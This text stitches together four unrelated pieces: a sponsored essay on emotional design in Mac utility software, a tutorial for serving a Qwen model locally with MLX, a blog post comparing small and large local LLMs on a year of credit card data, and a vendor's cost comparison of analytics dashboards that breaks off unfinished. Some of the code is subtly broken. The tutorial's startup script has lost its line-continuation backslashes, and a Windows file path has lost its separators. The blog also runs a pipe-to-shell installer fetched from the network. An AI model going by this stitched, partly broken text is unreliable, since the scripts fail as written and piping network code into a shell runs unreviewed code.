Rethinking The Experience Of System Tools

This article is sponsored by MacPaw

Your grandmother’s vacuum was a trusty but ugly workhorse hidden in a dark closet. Dyson turned that practical tool into an aspirational product, one you love leaving out even when guests come over. Dish soap was just dish soap until Method put it in a glass container, and it became an addition to, not a distraction from, the aesthetics of your kitchen. Physical product brands spent the last two decades transforming mundane, practical items like soap and vacuums into must-have experiences.

But utility software — especially maintenance tools, a type of system software designed to analyze, configure, optimize, and maintain a computer — hasn’t made that leap from something you open as a chore to an experience you choose with excitement. And that means those brands are missing an interesting design opportunity: these tools are well overdue for a more intelligent, more human, and less emotionally flat approach.

“The Most Underexplored Frontier In UX Is The Maintenance Layer.”

Utility software still feels like a chore. Using it has all the excitement of pulling out that dusty old vacuum from the back of the closet. These four common software design assumptions illustrate why the category hasn’t yet transcended its chore status.

  • Assuming the user already resents the task: they’re here because something is wrong, not because they chose to open this tool. Designing accordingly means assuming they want the software to be fast, clinical, invisible, and something to get out of the way, not get into. But a design built for resentment produces tools that deserve it. If you expect your users to want to get out of the product as fast as possible, they’ll feel it in the design.
  • Assuming function is enough and feelings are for consumer apps: emotion in interface design is decoration. The maintenance layer is infrastructure, and nobody decorates infrastructure. But nobody decorated dish soap either, until Method. They didn’t change the product, just the user’s relationship to the tool they use to accomplish a task.
  • Assuming your users are not your fans because nobody cares about maintenance tools: utility tools don’t build communities, and nobody posts about running a disk cleanup. But people care deeply about tools that respect their time and make complex things simple for them to use. The MacPaw team listens to our community and implements many of the features they ask for, because we know users can be fans too, and they should shape how our products work.
  • Assuming that designers shouldn’t waste pixels on personality: you need to hide complexity and show minimal UI. Utility software should look neutral, technical, and forgettable.

But when software hides the system, people lose trust in it.

Design always starts with function — function shapes form. But if that function can’t be made completely invisible and people still have to interact with it, it inevitably becomes part of their experience. In that case, people expect it not just to work, but to match their environment, influence their mood, and contribute to their overall experience.

A good example is a watch. Its core function is simple: show the time. But because a watch occupies physical space in a person’s world, you want more from it than just functionality. It needs to play an aesthetic role and complement the environment.

“The Maintenance Layer Is A Behavioral Problem, Not Just A UX One.”

The user experience in utility software matters more than the industry tends to admit. In utility software, experience is not something added on top of function. It emerges from how the function is structured, explained, and interacted with. If you think you can design the most functional app on the market without considering how users understand and experience the process, you’re missing an opportunity to build a relationship with that user.

Part of that ignored UX element is a behavioral problem: users don’t avoid utility software because using it is hard, but instead because it produces no positive emotional signal at any point. The problem is rarely complex. It’s the absence of meaningful interaction during the process of using the app.

Another issue is focusing solely on function. The aesthetic-usability effect shows us clearly that if something looks better, it feels better — ATM screens in a 1995 study were judged easier to use if the screen layout was more attractive. Even something as purely functional as an ATM screen display needs attention to how the function is structured, presented, and perceived.

And then there’s the memory problem. People remember the emotional peak and the ending of an experience, not the average. A completed process that ends with a clear “done” is remembered more positively than one that just fades out, even if the end task is completed successfully in both cases. System tools rarely intentionally design the ending of an interaction — they just stop running.

“Thoughtful System Design Can Transform Maintenance From A Technical Chore Into A Seamless User Experience.”

What does emotional design actually mean, then, in utility UX? Here are three principles the MacPaw team follows to design its products against the category norm.

Translating system complexity into human language

Maintenance tools deal with storage, task management, and background processes. Good design explains what’s happening, avoids system jargon, and communicates outcomes clearly.

Linear illustrates this principle well: the team settled on straightforward units of work, like projects and teams, that any new user can immediately understand. That helps them spend less time ramping up and more time building.

Make the process clear and show progress

System tools run complex processes. Design should show progress, impact, and system change to create trust and control.

Vercel’s deployment infrastructure is an excellent example here. When you trigger a build, the browser tab favicon changes — a spinner while building, a green checkmark when done, a red X if it fails. It’s ruthlessly functional, not visual or warm, but it’s emotionally intelligent: it exists purely to reduce the low-level anxiety of waiting for a build to finish.

Design the moment of completion

Maintenance tasks often end quietly. But completion is the emotional payoff. Design should emphasize clarity of results, a sense of resolution, and visible improvement so users remember a positive and distinct ending.

Take the new CleanMyMac by MacPaw after its 2024 major update. Unlike the maintenance utility category norm, CleanMyMac uses visual language, including color, depth, motion, icons, and 3D illustrations, to shift the focus from diagnosing problems to showing progress: space cleared, threats removed, time saved. Instead of confronting the user with what’s wrong, the interface closes with a picture of a machine that’s already working better.

The task is the same, but the ending tells a different story.

“Even if you don’t care about emotional design as a principle, the change is coming anyway.”

The market is forcing this issue even for those who don’t find the argument I’ve made here compelling.

That’s partly generational — designers and users who grew up with Linear, Figma, and Notion have a completely different baseline for the tools they use. Good software is not a happy accident for them, but a given. That generation is now the primary audience for maintenance software, and so the old “it’s fine, it’s just a utility” excuse doesn’t work philosophically or commercially. Just like Dyson and Method changed how entire product categories approached design, the current state of utility software is shifting for good.

And digital fatigue is the current cultural state. The resurgence of vinyl records, film cameras, and dumbphones is not merely nostalgia, but a signal that the emotional relationship between people and their tools is changing.

The question has shifted from whether your utility software should feel better to use to whether it can afford not to.

# How to Run Qwen3.6-35B on Your Mac at 77 tok/s

Level: intermediate

Estimated time: 20-40 minutes (most of it is the model download)

Minimum requirements: Mac with Apple Silicon (M1/M2/M3/M4) and 48 GB of unified RAM

What are we setting up?

A local server compatible with the OpenAI API that runs the Qwen3.6-35B-A3B model (quantized to 4 bits) using MLX, Apple’s Machine Learning framework for Silicon. When you’re done, you’ll have an endpoint at http://127.0.0.1:7979 that you can point any OpenAI-compatible client to (OpenCode, Continue, Cursor, etc.).

Metric                       Measured value
Generation throughput        ~77 tok/s
TTFT (time-to-first-token)   ~0.25 s
Context window               65,536–131,072 tokens
RAM required                 ~20 GB model + ~12 GB KV cache

Prerequisites

Hardware

  • Mac with Apple Silicon chip (M1 Pro/Max/Ultra or M2/M3/M4 equivalents)
  • Minimum 48 GB of unified RAM (the quantized model takes ~20 GB; the KV cache needs up to 12 GB additional)

Software

# Check Python version (you need 3.11+)
python3 --version

# Check that you have git
git --version

If you don’t have Python 3.11, install it with Homebrew:

brew install python@3.11

Step 1 — Create the virtual environment

From the folder where you want to install everything:

mkdir mlx-server && cd mlx-server
python3.11 -m venv .venv
source .venv/bin/activate

Step 2 — Install dependencies

pip install --upgrade pip

# MLX and the OpenAI API-compatible server
pip install mlx-lm
pip install mlx-openai-server

Verify the installation:

mlx-openai-server --help

Step 3 — Download the model

The model is automatically downloaded from Hugging Face the first time you run it. It takes approximately 20 GB of disk space.

# Optional pre-download (recommended to track progress)
python3 -c "
from mlx_lm import load
model, tokenizer = load('mlx-community/Qwen3.6-35B-A3B-4bit')
print('Model downloaded successfully')
"

Note: some Hugging Face repositories require a huggingface.co account and accepting the model’s terms before downloading. This model doesn’t require either.

Step 4 — Start the server

Option A — Direct command (simpler)

mlx-openai-server launch \
  --model-path mlx-community/Qwen3.6-35B-A3B-4bit \
  --model-type lm \
  --host 127.0.0.1 \
  --port 7979 \
  --tool-call-parser qwen3_coder \
  --reasoning-parser qwen3_5 \
  --enable-auto-tool-choice \
  --context-length 65536 \
  --temperature 0.7 \
  --top-p 0.8 \
  --top-k 20 \
  --min-p 0.0 \
  --repetition-penalty 1.05 \
  --max-bytes 12884901888 \
  --prompt-cache-size 3 \
  --log-level INFO

Option B — Startup script (recommended)

Save the following script as start-mlx-server.sh:

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
VENV="$SCRIPT_DIR/.venv"

# Default profile: high_context
# Change with: MLX_PROFILE=baseline ./start-mlx-server.sh
PROFILE="${MLX_PROFILE:-high_context}"

MODEL_PATH="mlx-community/Qwen3.6-35B-A3B-4bit"
HOST="127.0.0.1"
PORT="7979"

TOOL_CALL_PARSER="qwen3_coder"
REASONING_PARSER="qwen3_5"

TEMPERATURE="0.7"
TOP_P="0.8"
TOP_K="20"
MIN_P="0.0"
REPETITION_PENALTY="1.05"
MAX_CACHE_BYTES="12884901888"  # 12 GB

DRAFT_MODEL="mlx-community/Qwen3.5-0.8B-MLX-4bit"
NUM_DRAFT_TOKENS="${MLX_NUM_DRAFT_TOKENS:-4}"

case "$PROFILE" in
    baseline)
        CONTEXT_LENGTH="65536"
        PROMPT_CACHE_SIZE="3"
        EXTRA_ARGS=""
        ;;
    high_context)
        CONTEXT_LENGTH="131072"
        PROMPT_CACHE_SIZE="5"
        EXTRA_ARGS=""
        ;;
    speculative)
        CONTEXT_LENGTH="65536"
        PROMPT_CACHE_SIZE="3"
        EXTRA_ARGS="--draft-model-path ${DRAFT_MODEL} --num-draft-tokens ${NUM_DRAFT_TOKENS}"
        ;;
    speculative_high)
        CONTEXT_LENGTH="131072"
        PROMPT_CACHE_SIZE="5"
        EXTRA_ARGS="--draft-model-path ${DRAFT_MODEL} --num-draft-tokens ${NUM_DRAFT_TOKENS}"
        ;;
    *)
        echo "Unknown PROFILE: $PROFILE"
        echo "Options: baseline, high_context, speculative, speculative_high"
        exit 1
        ;;
esac

exec "$VENV/bin/mlx-openai-server" launch 
    --model-path "$MODEL_PATH" 
    --model-type lm 
    --host "$HOST" 
    --port "$PORT" 
    --tool-call-parser "$TOOL_CALL_PARSER" 
    --reasoning-parser "$REASONING_PARSER" 
    --enable-auto-tool-choice 
    --context-length "$CONTEXT_LENGTH" 
    --temperature "$TEMPERATURE" 
    --top-p "$TOP_P" 
    --top-k "$TOP_K" 
    --min-p "$MIN_P" 
    --repetition-penalty "$REPETITION_PENALTY" 
    --max-bytes "$MAX_CACHE_BYTES" 
    --prompt-cache-size "$PROMPT_CACHE_SIZE" 
    --log-level INFO 
    $EXTRA_ARGS
chmod +x start-mlx-server.sh
./start-mlx-server.sh

Usage examples:

./start-mlx-server.sh                                      # high_context (default)
MLX_PROFILE=baseline ./start-mlx-server.sh                # maximum throughput
MLX_PROFILE=speculative ./start-mlx-server.sh             # speculative decoding
MLX_PROFILE=speculative MLX_NUM_DRAFT_TOKENS=6 ./start-mlx-server.sh

Step 5 — Verify it works

In another terminal, send a test request:

curl http://127.0.0.1:7979/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "mlx-community/Qwen3.6-35B-A3B-4bit",
    "messages": [{"role": "user", "content": "Hello, what is 2+2?"}],
    "max_tokens": 100
  }'

You should see a JSON response with the choices[0].message.content field.
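If you have jq installed, you can pull just the answer out of the response (an optional convenience, not part of the setup):

curl -s http://127.0.0.1:7979/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model": "mlx-community/Qwen3.6-35B-A3B-4bit", "messages": [{"role": "user", "content": "Hello, what is 2+2?"}], "max_tokens": 100}' \
  | jq -r '.choices[0].message.content'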

Stopping the server

pkill -f mlx-openai-server

Or if you have the stop-mlx-server.sh script:

#!/usr/bin/env bash
pkill -f mlx-openai-server && echo "Server stopped."

Connect with your favorite client

The server exposes a 100% OpenAI-compatible API. Just point the base_url to your local server.

OpenCode

Create or edit the opencode.json file in the root of your project:

{
  "$schema": "https://opencode.ai/config.json",
  "provider": {
    "mlx-local": {
      "npm": "@ai-sdk/openai-compatible",
      "name": "MLX Local (Qwen3.6-35B)",
      "options": {
        "baseURL": "http://127.0.0.1:7979/v1"
      },
      "models": {
        "mlx-community/Qwen3.6-35B-A3B-4bit": {
          "name": "Qwen3.6-35B-A3B-4bit (local MLX)",
          "limit": {
            "context": 65536,
            "output": 32768
          }
        }
      }
    }
  }
}

Continue / Cursor

Base URL: http://127.0.0.1:7979/v1
API Key:  any-value  (the server does not validate it)
Model:    mlx-community/Qwen3.6-35B-A3B-4bit

Python (openai SDK)

from openai import OpenAI

client = OpenAI(
    base_url="http://127.0.0.1:7979/v1",
    api_key="local"
)

response = client.chat.completions.create(
    model="mlx-community/Qwen3.6-35B-A3B-4bit",
    messages=[{"role": "user", "content": "Explain what a transformer is"}]
)
print(response.choices[0].message.content)
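Streaming should work through the same SDK as well, assuming mlx-openai-server implements the standard OpenAI streaming mode (most OpenAI-compatible servers do). A sketch:

# Streaming variant: print tokens as they arrive
stream = client.chat.completions.create(
    model="mlx-community/Qwen3.6-35B-A3B-4bit",
    messages=[{"role": "user", "content": "Explain what a transformer is"}],
    stream=True,
)
for chunk in stream:
    # Each chunk carries an incremental delta of the response text
    if chunk.choices and chunk.choices[0].delta.content:
        print(chunk.choices[0].delta.content, end="", flush=True)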

Configuration profiles

Profile        Context    Cache       tok/s measured   When to use
baseline       65,536     3 entries   77.4             Maximum throughput
high_context   131,072    5 entries   75.7             Long documents, extended contexts (default)

The performance difference between both profiles (~2%) is within the noise margin. Use high_context if you work with large files or very long conversations.

Key parameters explained

Parameter              Value                  Why it matters
--max-bytes            12884901888 (12 GB)    Critical. Without this limit the model’s KV cache (MoE architecture with ArraysCache) grows unchecked until it exhausts RAM on contexts >30k tokens.
--prompt-cache-size    3 (LRU entries)        Limits how many conversations the prefix cache keeps in memory.
--context-length       65536 (64k tokens)     Maximum context window per request.
--temperature          0.7                    Balance between creativity and coherence.
--repetition-penalty   1.05                   Reduces repetitions in long responses.

Troubleshooting

The server disconnects after 30,000 tokens

This was a known bug with the Qwen3.6-35B-A3B model due to its hybrid MoE architecture. The fix is to make sure you pass --max-bytes 12884901888. With this parameter the server works correctly up to 60,000+ tokens (verified).

Architecture notes (for the curious)

Qwen3.6-35B-A3B is a hybrid MoE (Mixture of Experts) model. Instead of activating all parameters per token, it only activates a subset of “experts”, making it efficient for its size. The 4bit version quantizes the weights to 4 bits, reducing RAM usage from ~70 GB to ~20 GB with minimal quality loss.

MLX leverages Apple Silicon’s unified memory: the GPU and CPU share the same RAM pool, eliminating the transfer bottleneck that exists in systems with a dedicated GPU. That’s why a Mac with 48 GB can run a model that on a PC would require a GPU with 80 GB of VRAM.
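To see how much unified memory your own machine reports before committing to a ~20 GB download, macOS exposes the figure via sysctl:

# Installed unified memory, printed in GB (macOS)
echo "$(( $(sysctl -n hw.memsize) / 1073741824 )) GB"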

References

  • MLX on GitHub
  • mlx-lm
  • Model on Hugging Face
  • mlx-openai-server

[Day 3] I Had a Local LLM Analyze a Year of My Credit Card Statements

Intro

Day 3: I’m going to hand a year of credit card statements over to a local LLM and see what it can do.

This is experiment #3.

What I’m using today: DGX Spark + Ollama + Qwen2.5 (comparing 7B vs 72B). Ollama is the de-facto local-LLM runtime, and Qwen2.5 is a multilingual model from Alibaba (China) that handles Japanese reasonably well, apparently.

Today’s setup

  • Data: 12 months of credit card statements from a single card.
  • Volume: 383 transactions, ¥2,761,555 in total spend.
  • Goal: get the AI to spot waste patterns and propose savings.
  • Comparison axes:

    • Model size: 7B (light) vs 72B (heavy)
    • Input format: raw CSV vs pandas-aggregated summary
    • 4 patterns total

Takeaway: “If you ask an AI to aggregate raw data, the numbers come out way off.” / “If you pre-aggregate with a spreadsheet tool first and then feed the AI, you get fast and accurate results.” A small but practical finding.

1. Get the CSVs onto the DGX

Log into the credit card company’s web statements page on myPC1 (my Windows laptop), download 12 months of CSVs, then push them to the DGX.

I deliberately skipped GitHub for the transfer this time — once you push something, it’s in the history forever, and credit card data shouldn’t be there even briefly. Instead, I used direct PC-to-PC transfer over SSH (one command, finishes in seconds; details in the collapsibles at the end). The .gitignore excludes private-data/ too, so accidental commits are ruled out.

2. Install Ollama

Ollama is the de-facto runtime for local LLMs. One command should be enough.

There was a small password hiccup during install (details below), but eventually it was up and running.

The DGX Spark specs really show through:

  • Memory: 121 GB
  • Default context window: ~262,144 tokens

In other words: “throw a whole book at it, no problem” territory. Reassuring.

3. Two model sizes: Qwen2.5 7B vs 72B

The strategy: same model family, different sizes. That way the differences come from size, not architecture.

  • 7B (light): ~4.7 GB, downloads in 5 minutes. Fast.
  • 72B (heavy): ~47 GB, 25 minutes to download. Slow but smart.

What does “B” mean? It’s short for billion: the number of “weights” inside the AI. More weights, more it can remember, basically. So 7B has 7 billion weights, and 72B has 72 billion.

Loading both onto the DGX simultaneously, memory usage looks like:

AI model      Memory occupied
qwen2.5:72b   61 GB
qwen2.5:7b    8.2 GB
Total         69 GB

69 GB. Spacious!

4. Prepping the CSVs

Once I had the CSVs in hand, three small headaches before they were ready for the AI:

  • Headache 1: An older encoding (Windows Japanese flavor) → needs converting to modern UTF-8
  • Headache 2: Some merchant names contain commas, which breaks naive CSV parsing
  • Headache 3: Each file has a “monthly total” line at the end that isn’t actually data

Details in the collapsible. After cleanup, the 12 files merge into a single dataset:

Item                Value
Transactions        383
Period              12 months (1 year)
Total spend         ¥2,761,555
Avg per tx          ¥7,210
Median per tx       ¥3,000
Largest single tx   ¥209,283 (overseas flight)
Smallest            ¥-3,980 (refund)

Now to feed this to 7B and 72B and see what each of them says.

5. Experiment 1: Throw the raw CSV at the AI

No tricks: all 383 rows, straight at the AI. Prompt is the full ask: “As a household budget consultant, output category breakdown / monthly trend / waste patterns / savings suggestions / lifestyle hypothesis.”

7B’s answer (75 seconds)

…this is where the numbers go wildly off.

Item                       What 7B said           Real data                                    Match?
Amazon total               ¥2,014,386 (257 tx)    ¥693,663 (166 tx)                            ❌
Amazon Downloads           ¥2,014,386 (257 tx)    ¥80,323 (50 tx)                              ❌
Outdoor brand              ¥495,740               ¥154,820                                     ❌
A local recreation venue   “¥49,574” cited        (a different small charge actually exists)   ❌

None of the numbers line up. Amazon total is roughly 3× off, Amazon Downloads about 25× off, and the cited venue context is a different charge entirely.

Reading 383 rows of CSV and computing totals turned out to be a heavy lift for the 7B model.

72B’s answer (12m 9s)

What if we throw size at the problem? After 12 minutes of patience:

Item           What 72B said       Real data           Match?
Amazon total   ¥635,792 (104 tx)   ¥693,663 (166 tx)   △
AI/dev tools   ¥193,629 (21 tx)    ¥176,850 (24 tx)    △
Travel         ¥487,555 (43 tx)    ¥416,268 (8 tx)     △

Not exact, but the off-by amounts are within ~10%, and there are no fabricated venues. A real improvement.

However — when asked about the monthly trend, here’s what 72B said:

Month 1: ¥316,789 → Month 2: ¥229,600 → Month 3: ¥237,500 → … → Month 12: ¥291,500
(Gradually increasing.)

The actual range is ¥69,961 (low) to ¥493,072 (high) — a chaotic up-and-down waveform. “Gradually increasing” isn’t quite right. Even 72B isn’t great at aggregating distributed data over a long CSV.

6. Experiment 2: Aggregate first, then feed the AI

If the AI struggles with aggregation, do the aggregation in a different tool first and only hand the AI the result.

The flow:

📥 Raw CSV (22,132 chars, 383 rows)
       ↓
🔧 Pre-aggregate with a spreadsheet tool (Python's pandas)
       ↓
📋 Aggregate summary (1,884 chars, ~90% smaller)
       ↓
🤖 Hand it to the AI (let it interpret and propose)

Python’s pandas = a spreadsheet-like library, but ~10,000× more powerful than Excel functions, used for tabular data analysis.
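Roughly, the pre-aggregation step looks like this (a sketch: the merchant column name below is a placeholder, and the real script works with the card CSV’s Japanese headers):

import pandas as pd

MERCHANT_COL = "merchant"  # placeholder — the real CSV uses the card company's header

# df: the merged 383-row DataFrame with 利用日 (date) and 利用金額 (amount)
monthly = df.groupby(df["利用日"].dt.to_period("M"))["利用金額"].sum()
top_merchants = (
    df.groupby(MERCHANT_COL)["利用金額"]
      .agg(["sum", "count"])
      .sort_values("sum", ascending=False)
      .head(15)
)

summary = (
    "== Monthly totals ==\n" + monthly.to_string()
    + "\n== Top 15 merchants ==\n" + top_merchants.to_string()
)
print(len(summary))  # ~1,900 characters instead of 22,000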

7B + pre-aggregated input (50 seconds)

Numbers are fully accurate now.

Item           What 7B said   Real data    Match?
Amazon total   ¥693,663       ¥693,663     ✅
AI/dev tools   ¥176,850       ¥176,850     ✅
Monthly max    ¥493,072       ¥493,072     ✅
Monthly min    ¥69,961        ¥69,961      ✅

Quoting straight from the pre-aggregated numbers, the hallucinations vanished.

And 7B did this in 50 seconds — better quality than the 72B + raw CSV at 12 minutes. Quietly remarkable.

          Before (raw CSV)    After (aggregated)
Time      75s                 50s
Numbers   wildly off          exact
Verdict   not usable as-is    quote directly

72B + pre-aggregated input (12m 13s)

72B’s numbers also match exactly (well, since they’re being quoted from pre-aggregated data, that’s expected). The proposal quality was the strongest of the four patterns:

Reduce Amazon dependency

  • Current: online shopping (Amazon family) is 25.1% of total (¥693,663).
  • Suggestion: stick to essentials only, regular review, avoid impulse buys.
  • Expected savings: ¥57,805/month average (25% reduction) → ¥693,660/year

…wait, hold on. Annual Amazon spend was ¥693,663. The “savings” 72B suggests is ¥693,660. That’s basically the same number. So the proposal is effectively “stop buying on Amazon entirely (100%)” — definitely not 25%. Apparently 72B’s percentage arithmetic isn’t bulletproof either.

That aside, the lifestyle hypothesis section was kind of striking. Here’s what 72B observed:

  • Heavy reliance on apps and subscriptions: “App/subscription” category is 10.5% of total
  • Frequent international travel: “Travel/airline” is 15.1%, with notable overseas charges
  • Frequent online shopping: “Online (Amazon)” is 25.1% of total

It’s just one card’s data, so this isn’t a complete picture — but if I fed an AI my full household financials, the analysis and advice would probably go a lot deeper.

Summary: 4 patterns

#   Model   Input        Time      Numerical accuracy        Proposal quality
1   7B      Raw CSV      75s       ❌ Numbers way off         —
2   72B     Raw CSV      12m 9s    △ Misread monthly trend   —
3   7B      Aggregated   50s       ✅ Exact                   ○ Some repetition
4   72B     Aggregated   12m 13s   ✅ Exact                   ◎ Best (mind the % math)

Quietly notable: 72B takes ~12 minutes regardless of input size (shrinking the prompt didn’t change wall-clock time much). Output generation is the bottleneck. Which strengthens the case for “small model + pre-aggregate” as the cost-effective default.

7. Cross-check: the actual graphs

Before trusting any of the AI output, let me put the real numbers on charts using the spreadsheet tool (pandas).

Monthly spending


Average ¥230,130/month, but the range is ¥69,961 (lowest) to ¥493,072 (highest) — about a 7× spread. The 72B’s “gradually increasing” claim was a bit off the mark; the reality is bouncy.

Category share


“Other” being 32% is because my categorization rule is sloppy. I just wrote a simple “if the merchant name contains keyword X, bucket Y” rule, and lots of merchants didn’t match any keyword and ended up in “Other.” Reading meaning from a merchant name is exactly the kind of thing AI is good at, so next time I’ll let the AI do the categorization itself.

Top 15 merchants


Amazon at ¥421,978 (105 tx) is far and away #1. Amazon really is too convenient…

Weekday rhythm


Tuesday alone is ¥692,549 — way above the rest. Probably because that’s when most of the subscription auto-charges land.

8. Today’s takeaways

Separate “aggregation” from “interpretation”

AI is bad at                                      AI is good at
Multi-row sum/average (numbers go wildly off)     Categorization (interpreting fuzzy meaning)
Percentage math (saw “25% off → 100% off”)        Pattern recognition / hypothesis generation
Distributed aggregation like monthly totals       Narrative interpretation, savings proposals

Aggregation is the spreadsheet tool’s job; interpretation is the AI’s. When you split the work, things go fast and accurate. “Data prep matters before analysis” — yeah, that old saying really is true. Note to self.

Sometimes input quality beats raw size

“7B + pre-aggregated input in 50 seconds” outperformed “72B + raw CSV in 12 minutes”. Sometimes you don’t need a bigger model — you need cleaner input. Felt that one today.

The local-LLM angle

Feeding 12 months of raw credit card data to an AI without a single byte going to the cloud — it was surprisingly stress-free. This is one of the spots local LLMs really shine. Got personal info, or anything you’d rather keep off the cloud? This is the place for it.

9. Tech details (Claude explains)

The technical bits, written up by my AI pair.

  1. SCP transfer to the DGX (mDNS, no IP needed)

NVIDIA Sync auto-configures a Host alias in ~/AppData/Local/NVIDIA Corporation/Sync/config/ssh_config:

Host spark-XXXX.local
  Hostname spark-XXXX.local
  User [user]
  Port 22
  IdentityFile "...\nvsync.key"

Which means I can SSH/SCP using spark-XXXX.local without ever looking up an IP. The .local suffix uses mDNS (Multicast DNS) for hostname resolution within the LAN.

Transfer command (one line, from PowerShell on the Windows side):

scp -r "C:Users[user]Desktopdocsdgxcsv" spark-XXXX.local:/home/[user]/personal/dgx-100-experiments/private-data/credit-card-csv
  1. Ollama install + the sudo-TTY catch + GPU detection log

Ollama install:

curl -fsSL https://ollama.com/install.sh | sh

Running this through Claude Code’s Bash, it errored at the sudo password prompt — an interactive TTY is required there:

sudo: a terminal is required to read the password

Reopened a separate SSH session, ran the same command manually, and it went through.

Once installed, systemd auto-starts the service. The GPU detection log via journalctl -u ollama:

inference compute id=GPU-986c194b... name=CUDA0 description="NVIDIA GB10"
total="121.7 GiB" available="79.0 GiB"
default_num_ctx=262144

  • VRAM (DGX Spark unified memory): 121.7 GiB
  • Default context: 262,144 tokens

Compared with a typical RTX 4090 (24 GB VRAM, 8K–32K default context), the gap is significant.

  3. Loading both models simultaneously

ollama pull qwen2.5:7b   # 4.7 GB
ollama pull qwen2.5:72b  # 47 GB

After loading both, ollama ps shows:

NAME           SIZE      PROCESSOR    CONTEXT    
qwen2.5:72b    61 GB     100% GPU     32768
qwen2.5:7b     8.2 GB    100% GPU     32768

Total ~69 GB used out of 79 GB available. Both models stay resident, switching between them is instant.

  4. Custom CSV parser for the credit card data

Three quirks needed handling: CP932 encoding, no quotes (commas in some merchant names break parsing), and a trailing summary row in each file.

from pathlib import Path

import pandas as pd


def parse_line(line: str) -> list[str] | None:
    fields = line.rstrip("\r\n").split(",")
    if len(fields) < 7 or not fields[0]:
        return None  # skip blank/summary rows
    if len(fields) > 7:
        # Unquoted commas in the merchant name: re-join the middle fields
        merchant = ",".join(fields[1:-5])
        fields = [fields[0], merchant] + fields[-5:]
    return fields


def load_one(path: Path) -> pd.DataFrame:
    rows = []
    with path.open(encoding="cp932") as f:
        next(f)  # skip header (cardholder metadata)
        for line in f:
            parsed = parse_line(line)
            if parsed is not None:
                rows.append(parsed)
    # COLUMNS: the seven column names for the card CSV, defined elsewhere in the script
    df = pd.DataFrame(rows, columns=COLUMNS)
    df["利用日"] = pd.to_datetime(df["利用日"], format="%Y/%m/%d")
    df["利用金額"] = df["利用金額"].astype(int)
    return df
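
Merging the 12 monthly files is then a one-liner (the directory path here is illustrative):

csv_dir = Path("private-data/credit-card-csv")  # illustrative path
df = pd.concat(
    [load_one(p) for p in sorted(csv_dir.glob("*.csv"))],
    ignore_index=True,
)
print(len(df))  # 383 transactions across 12 files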
  5. Japanese fonts in matplotlib

japanize-matplotlib doesn’t work on Python 3.12 — it imports distutils, which was removed from the standard library.

The modern replacement is matplotlib-fontja:

pip install matplotlib-fontja
import matplotlib_fontja  # noqa: F401  ← just importing it sets up IPAexGothic
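
With the font set up, a chart like the monthly-spending one renders Japanese labels correctly. A minimal sketch, reusing the merged df from the parser section:

import matplotlib.pyplot as plt
import matplotlib_fontja  # noqa: F401

monthly = df.groupby(df["利用日"].dt.to_period("M"))["利用金額"].sum()
monthly.plot(kind="bar", title="月別支出")  # Japanese title, no tofu squares
plt.tight_layout()
plt.savefig("monthly.png")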
  6. Calling Ollama from Python

The official ollama Python client is straightforward:

import ollama

client = ollama.Client()
stream = client.chat(
    model="qwen2.5:72b",
    messages=[
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": user_prompt},
    ],
    options={"temperature": 0.3},
    stream=True,
)
for chunk in stream:
    print(chunk["message"]["content"], end="", flush=True)

Streaming makes long generation easier to watch unfold.

Tomorrow: Day 4

Day 4 plan: let a local AI sort 20,000 iPhone photos.

The actual goal is to have a local image-recognition model (CLIP family?) clean up my photo library so I can stop paying iCloud for storage upgrades…!

#100ExperimentsWithDGX #LocalLLM #Ollama

The Hidden TCO of Self-Hosting Your EC Revenue Dashboard in 2026

“If we self-host Matomo or Umami, the revenue dashboard is free, right?” That’s one of the most common questions I hear from SMB EC operators in Japan. The short answer: license-fee-free is not TCO-free. After laying four options side-by-side at Japanese freelance rates, self-hosted dashboards land at ¥460K-880K per year — 4-7x the cost of a focused SaaS like the one I’m building.

I’ve been building RevenueScope for the Japan SMB EC market, so I have a stake in this comparison. But the math here is structural, not promotional: when you account for build hours, ongoing ops, server costs, and learning curve, “free” OSS quietly becomes one of the most expensive choices on the table.

This post walks through the TCO breakdown, the three hidden cost layers most operators miss, and a 3-question framework that decides between self-hosted and SaaS in about 60 seconds.

TL;DR

  1. Self-hosting Matomo, Umami, or rolling your own GA4+Looker Studio dashboard runs ¥460K-880K per year at a ¥5,000/hour Japanese freelance rate (industry-average estimates, not measured ground truth).
  2. A focused SaaS option for SMB EC — RevenueScope Growth at ¥9,800/month (~¥117K/year) — sits 4-7x lower on TCO.
  3. The hidden cost is a three-layer stack: opportunity cost (40 build hours not spent on revenue work), learning curve (Matomo configs, GA4 event design, Looker DAX), and upgrade churn (OSS major versions, GA4 API breaks). License-fee-zero hides all three.

Why “TCO” matters more than license fees

The “OSS is free” intuition only counts software license cost. Real total cost of ownership for an EC operator pulls in at least four other line items:

  • Initial build hours — server setup, tracking install, dashboard build, first-pass QA
  • Monthly ops hours — data quality checks, tracking fixes, new metric requests, incident response
  • Server cost — VPS / cloud / storage
  • Learning curve — docs, Stack Overflow, internal wiki, knowledge transfer

Counted as labor at ¥5,000/hour (the Japanese freelance marketing/data-analyst median), self-hosted TCO climbs into the high hundreds of thousands of yen — quickly.

The second concept that operators tend to miss is opportunity cost. Forty hours spent building a Matomo dashboard is forty hours not spent on creative A/B tests, LP iterations, or email segmentation work. For a JPY-10M-monthly EC, those forty hours represent roughly 25% of a working month — directly tradeable against revenue work.

License-fee-zero and TCO-zero are different numbers. That’s the starting point for any honest comparison.

One-year TCO across four options

I lined up Matomo On-Premise, Umami v3, GA4 + Looker Studio, and RevenueScope Growth at industry-average estimates (not measured ground truth — your numbers will vary).

One-Year TCO Comparison — Matomo / Umami / GA4+Looker / RevenueScope

The annual numbers (rounded, ¥5,000/hr labor):

  • Matomo self-hosted — ~¥880K (40h build + 8h/mo ops + ¥3K/mo hosting + 16h learning)
  • Umami self-hosted — ~¥460K (20h build + 4h/mo ops + ¥2K/mo hosting + 8h learning)
  • GA4 + Looker Studio — ~¥500K (16h build + 6h/mo ops + 12h learning; product is free, your time isn’t)
  • RevenueScope Growth — ~¥117K (¥9,800/mo plan + ~0.5h/mo to actually look at the dashboard)

The “free” intuition collapses the moment you add 40 build hours and 6-8 ongoing ops hours per month at Japanese freelance rates. The license is the small line item; labor is everything else.

The three hidden cost layers

Beyond the headline numbers, three layers of hidden cost stack on top of self-hosting and account for most of the gap between OSS and SaaS economics.

Annual Operations Hours — 4-Option Comparison (the symbol of hidden labor)

